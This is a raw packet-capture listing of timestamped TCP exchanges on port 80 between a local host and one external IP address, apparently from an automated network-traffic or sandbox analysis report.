                                                                                                                                                                                                Dec 13, 2024 08:18:52.043025970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.043173075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.043252945 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.044250965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.044322014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.044409037 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.045414925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.045490980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.045569897 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.046639919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.046735048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.046811104 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.047899961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.047979116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.048060894 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.049001932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.049114943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.049192905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.050199986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.050286055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.050373077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.051409960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.051516056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.051563025 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.052602053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.052685022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.052732944 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.053755045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.053889036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.053935051 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.054948092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.055059910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.055145979 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.056127071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.056263924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.056345940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.057351112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.057441950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.057565928 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.058537006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.058664083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.058778048 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.059724092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.059835911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.059914112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.060924053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.061072111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.061163902 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.062206984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.062223911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.062318087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.063330889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.063426018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.063507080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.064523935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.064656973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.064744949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.065721989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.065850019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.065939903 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.066926956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.066952944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.067033052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.068063974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.068224907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.068301916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.069351912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.069479942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.069559097 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.070482016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.070533037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.070612907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.071779966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.071846962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.071927071 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.072890997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.073024035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.073102951 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.074091911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.074227095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.074306011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.075258017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.075382948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.075478077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.076493025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.076566935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.076661110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.077694893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.077861071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.077976942 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.078882933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.078984976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.079061985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.080051899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.080172062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.080255985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.081232071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.081337929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.081422091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.082459927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.082557917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.082638025 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.083632946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.083728075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.083808899 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.084970951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.084988117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.085079908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.086160898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.086179018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.086281061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.087213039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.087341070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.087419033 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.088408947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.088521004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.088594913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.089581966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.089704037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.089796066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.090801954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.090933084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.091017008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.091922045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.136878967 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.221400976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.221430063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.221565962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.221800089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.221883059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.221956968 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.222745895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.222773075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.222878933 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.223917007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.224037886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.224128008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.225131035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.225239992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.225311041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.226305962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.226460934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.226560116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.227510929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.227619886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.228039026 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.228699923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.228826046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.228915930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.229882956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.230010033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.230087042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.231086969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.231230021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.231334925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.232295036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.232399940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.232554913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.233478069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.233562946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.233638048 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.234672070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.234782934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.234947920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.235877991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.236021042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.236094952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.237052917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.237194061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.237277031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.238272905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.238365889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.238445044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.239511013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.239593029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.239670038 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.240704060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.240788937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.240881920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.241844893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.241969109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.242048979 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.243079901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.243233919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.243323088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.244235039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.244344950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.244421959 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.245428085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.245532036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.245620966 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.246618032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.246733904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.246824026 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.247795105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.247912884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.247997046 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.249047995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.249172926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.249255896 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.250220060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.250309944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.250397921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.251595974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.251666069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.251744032 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.252672911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.252688885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.252769947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.253762960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.253899097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.253978014 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.254959106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.255089045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.255163908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.256141901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.256247044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.256334066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.257363081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.257455111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.257539988 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.258626938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.258682966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.258761883 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.259860039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.260169983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.260251999 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.260996103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.261091948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.261178017 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.262121916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.262252092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.262329102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.263353109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.263449907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.263523102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.264518023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.264642000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.264734983 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.265702009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.265814066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.265908003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.267055988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.267163038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.267246008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.268122911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.268214941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.268289089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.269282103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.269334078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.269411087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.270524979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.270612955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.270703077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.271681070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.271785975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.272001028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.272910118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.273010015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.273092985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.274102926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.274164915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.274247885 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.275269032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.275377989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.275464058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.276496887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.276613951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.276690960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.277662992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.277815104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.277894974 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.278841972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.278947115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.279033899 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.280055046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.280152082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.280236959 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.281239033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.281353951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.281438112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.282457113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.282581091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.282661915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.283628941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.324371099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.413372040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.413470030 CET8049726185.81.68.147192.168.2.11
